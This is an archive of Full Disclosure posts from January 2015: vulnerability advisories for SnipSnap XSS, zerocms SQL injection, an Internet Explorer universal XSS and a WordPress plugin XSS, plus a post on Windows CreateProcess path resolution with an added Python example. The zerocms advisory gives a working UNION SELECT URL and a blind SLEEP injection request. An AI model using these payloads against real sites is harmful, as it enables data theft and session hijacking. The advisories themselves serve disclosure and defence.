[FD] CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities
Exploit Title: SnipSnap /snipsnap-search? query Parameter XSS
Product: SnipSnap
Vulnerable Versions: 0.5.2a 1.0b1 1.0b2
Tested Version: 0.5.2a 1.0b1 1.0b2
Advisory Publication: Jan 30, 2015
Latest Update: Jan 30, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9559
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]

Advisory Details:

(1) Vendor Product Description

Vendor: SnipSnap
Product Version: SnipSnap 0.5.2a 1.0b1 1.0b2
Vendor URL Download: http://snipsnap.org
Product Description: SnipSnap is a user-friendly content management system with features such as wiki and weblog.

(2) Vulnerability Details:

SnipSnap has a security problem. It can be exploited by XSS attacks.

(2.1) The vulnerability occurs at the snipsnap-search? page with the query parameter.

References:
http://tetraph.com/security/cves/cve-2014-9559-snipsnap-xss-cross-site-scripting-security-vulnerabilities/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9559
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9559
https://security-tracker.debian.org/tracker/CVE-2014-9559
http://www.cvedetails.com/cve/CVE-2014-9559/
http://www.security-database.com/detail.php?alert=CVE-2014-9559
http://packetstormsecurity.com/files/cve/CVE-2014-9559
http://www.pentest.it/cve-2014-9559.html
http://www.naked-security.com/cve/CVE-2014-9559/
http://007software.net/cve-2014-9559/

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SQL injection vulnerabilities in zerocms <= v.1.3.3
Advisory: SQL injection vulnerabilities in zerocms <= v.1.3.3
Advisory ID: SROEADV-2015-13
Author: Steffen Rösemann
Affected Software: zerocms <= v.1.3.3 (released 23rd-Jan-2015)
Vendor URL: http://aas9.in/zerocms/
Vendor Status: platform will be moving to Rails4
CVE-ID: -

== Vulnerability Description: ==

Content management system Zerocms v. 1.3.3 suffers from SQL injection vulnerabilities.

== Technical Details: ==

The article_id-parameter used in zero_view_article.php is vulnerable to SQL injection. It is located here in a common Zerocms-installation and can be exploited even by unregistered users:

http://{TARGET}/views/zero_view_article.php?article_id=1

Exploit-Example:

http://{TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+

A Blind SQL injection vulnerability can be found in the file zero_user_transact.php. The parameter user_id is vulnerable to SQL injection. See the following example POST-request which serves as exploit-example:

POST /views/zero_transact_user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://{TARGET}/views/zero_user_account.php?user_id=2
Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

name=user&email=user%40user.de&access_level=1&user_id=2 AND SLEEP(30)&action=Modify+Account

The Blind SQL injection vulnerability can be exploited on the administrative backend of Zerocms.

The vulnerabilities described above have been tested on the following versions of Zerocms:

- v. 1.3.2
- v. 1.3.3

= Solution: =

Vendor seems not to provide a patch for these vulnerabilities as version 1.3.3 is the last release for this PHP-based platform. It will be developed on the Rails4-platform in future releases (see Github repository, release section).

Disclosure Timeline:

23-Jan-2015 - found the vulnerabilities in v.1.3.2
23-Jan-2015 - informed the developers (see [3])
23-Jan-2015 - release date of this security advisory [without technical details]
23-Jan-2015 - forked the vulnerable version to keep it available for other researchers (see [4])
23-Jan-2015 - developer released v.1.3.3 of zerocms
24-Jan-2015 - vulnerabilities can also be found in v.1.3.3
29-Jan-2015 - as vendor will move the platform to Rails4, it seems that there will be no patch provided (see [5])
29-Jan-2015 - release date of this security advisory
29-Jan-2015 - sent to FullDisclosure

Credits:

Vulnerability found and advisory written by Steffen Rösemann.

=== References: ===

[1] http://aas9.in/zerocms/
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-13.html
[3] https://github.com/perezkarjee/zerocms/issues/3
[4] https://github.com/sroesemann/zerocms
[5] https://twitter.com/sroesemann/status/559273548691546113
[FD] Major Internet Explorer Vulnerability - NOT Patched
Deusen just published code and description here:

http://www.deusen.co.uk/items/insider3show.3362009741042107/

which demonstrates the serious security issue.

Summary

An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk can be changed by external domain.

How To Use

1. Close the popup window (confirm dialog) after three seconds.
2. Click Go.
3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.

Technical Details

Vulnerability: Universal Cross Site Scripting (XSS)
Impact: Same Origin Policy (SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject anything into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7

If you like it, please reply nice.

Kind Regards,
[FD] Defense in depth -- the Microsoft way (part 27): the command line you get differs from the command line I use to call you
Hi @ll,

on Windows, the command line an application receives can differ from the command line the calling application supplies to CreateProcess*().

The documentation of GetCommandLine()
https://msdn.microsoft.com/en-us/library/ms683156.aspx
tells:

| Note The name of the executable in the command line that
| the operating system provides to a process is not necessarily
| identical to that in the command line that the calling process
| gives to the CreateProcess function. The operating system may
| prepend a fully qualified path to an executable name that is
| provided without a fully qualified path.

This is not the whole truth, another Note is missing there: when CreateProcess*() is called using a command line with an UNQUOTED long filename/pathname containing spaces (a well-known VULNERABILITY: https://cwe.mitre.org/data/definitions/428.html) it uses trial and error to guess the pathname of the executable.

The documentation of CreateProcess()
https://msdn.microsoft.com/en-us/library/ms682425.aspx
tells:

| [...] the module name must be the first white space-delimited
| token in the lpCommandLine string. If you are using a long file
| name that contains a space, use quoted strings to indicate where
| the file name ends and the arguments begin; otherwise, the file
| name is ambiguous. For example, consider the string
|     c:\program files\sub dir\program name.
| This string can be interpreted in a number of ways. The system
| tries to interpret the possibilities in the following order:
|     c:\program.exe files\sub dir\program name
|     c:\program files\sub.exe dir\program name
|     c:\program files\sub dir\program.exe name
|     c:\program files\sub dir\program name.exe

In the latter 3 cases the command line is modified too: Windows adds quotes around the part of the command line which forms the result of this interpretation and yields the path to the executable if this part contains a space.

The 4 command lines shown above are transformed into:

    c:\program.exe files\sub dir\program name
    "c:\program files\sub.exe" dir\program name
    "c:\program files\sub dir\program.exe" name
    "c:\program files\sub dir\program name.exe"

JFTR: without this transformation splitting of the command line into the argv vector would give wrong results ... in presence of CreateProcess*() braindead behaviour!

Stay tuned!
regards
Stefan Kanthak

PS: the documentation of CommandLineToArgvW()
https://msdn.microsoft.com/en-us/library/bb776391.aspx
contains a funny and surprising remark:

| This function accepts command lines that contain a program name;
| the program name can be enclosed in quotation marks or not.

This does NOT mean that CommandLineToArgvW() tries to guess like CreateProcess()! It treats "c:\program files\sub dir\program name" as c:\program files\sub dir\program name.
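The candidate search and the quoting rewrite described in the post above, as an added example that is not code from the post and does not call Win32: it replays the search order the CreateProcess documentation lists and the rewrite Stefan describes on a constructed command line, with a caller-supplied `exists` callback standing in for the file system, and `safe_command_line` shows the CWE-428 fix on the caller's side using `subprocess.list2cmdline` (the Windows quoting convention Python's subprocess module uses).

```python
"""Model of how CreateProcess resolves an unquoted module name (CWE-428).
Added example: not code from the post; no Win32 is called. The search
order follows the CreateProcess documentation, the rewrite follows the post.
"""
import subprocess
from typing import Callable, Optional


def _has_extension(path: str) -> bool:
    """True when the last path component already carries an extension."""
    return "." in path.rsplit("\\", 1)[-1]


def candidate_splits(cmdline: str) -> list[tuple[str, str]]:
    """Return (module-name candidate, remaining arguments) pairs in the
    order CreateProcess tries them: the head grows one whitespace-delimited
    token at a time, and ".exe" is appended when the head has no extension."""
    if cmdline.startswith('"'):
        # A quoted module name is unambiguous: take it as given.
        end = cmdline.index('"', 1)
        return [(cmdline[1:end], cmdline[end + 1:].lstrip())]
    tokens = cmdline.split(" ")
    splits = []
    for n in range(1, len(tokens) + 1):
        head = " ".join(tokens[:n])
        if not _has_extension(head):
            head += ".exe"
        splits.append((head, " ".join(tokens[n:])))
    return splits


def resolve_command_line(cmdline: str, exists: Callable[[str], bool]) -> Optional[str]:
    """Pick the first candidate that `exists` (a stand-in for the file
    system) and rewrite the command line as the post describes: the resolved
    path is quoted when it contains a space, so argv splitting stays right."""
    for path, rest in candidate_splits(cmdline):
        if exists(path):
            head = f'"{path}"' if " " in path else path
            return f"{head} {rest}" if rest else head
    return None  # no candidate exists: CreateProcess would fail


def safe_command_line(exe_path: str, *args: str) -> str:
    """The fix for the caller: quote the executable (and every argument)
    with the Windows convention, so the first token is never ambiguous."""
    return subprocess.list2cmdline([exe_path, *args])
```

Running `resolve_command_line` with different `exists` callbacks reproduces the four rewritten command lines from the post; only the first, whose resolved path has no space, is left unquoted.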
[FD] Banner Effect Header Security Advisory - XSS Vulnerability - CVE-2015-1384
Information

Advisory by Netsparker.
Name: XSS Vulnerability in Banner Effect Header
Affected Software: Banner Effect Header
Affected Versions: 1.2.7 and possibly below
Vendor Homepage: https://wordpress.org/plugins/banner-effect-header/
Vulnerability Type: Cross-site Scripting
Severity: Important
CVE-ID: CVE-2015-1384
Netsparker Advisory Reference: NS-15-002

Description
---

By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged-in user's session. This means that the malicious hacker can change the logged-in user's password and invalidate the session of the victim while the hacker maintains access. As seen from the XSS example in this article, if a web application is vulnerable to cross-site scripting and the administrator's session is hijacked, the malicious hacker exploiting the vulnerability will have full admin privileges on that web application.

Technical Details
---

Proof of Concept URLs for XSS in Banner Effect Header:

URL: /wp-admin/options-general.php?page=BannerEffectOptions
Parameter Name: banner_effect_divid
Parameter Type: Post
Attack Pattern: onclick=alert(1)

For more information on cross-site scripting vulnerabilities read the following article on Cross-site Scripting (XSS) - https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline
---

21/01/2015 - First Contact
29/01/2015 - Vulnerability fixed
29/01/2015 - Advisory released

Solution
---

Download version 1.2.8 which includes a fix for this vulnerability.

Credits
---

Authors - These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner - https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker
---

Netsparker finds and reports security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities, hence it is the first and only False Positive Free web application security scanner. For more information visit our website on https://www.netsparker.com